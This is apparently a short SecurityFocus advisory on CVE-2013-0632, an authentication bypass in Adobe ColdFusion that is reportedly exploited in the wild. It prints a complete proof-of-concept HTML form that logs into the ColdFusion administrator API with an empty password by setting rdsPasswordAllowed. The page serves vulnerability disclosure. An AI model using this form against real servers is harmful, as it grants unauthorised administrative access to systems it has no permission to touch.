Adobe ColdFusion CVE-2013-0632 Authentication Bypass Vulnerability

Reportedly, this issue is being exploited in the wild.

The following Metasploit exploits and example code are available:

<form action="http://[HOSTNAME]/CFIDE/adminapi/administrator.cfc?method=login" method="post">
<input type="hidden" name="adminpassword" value="">
<input type="hidden" name="rdsPasswordAllowed" value="1">
<input type="submit">
</form>


 

Privacy Statement
Copyright 2010, SecurityFocus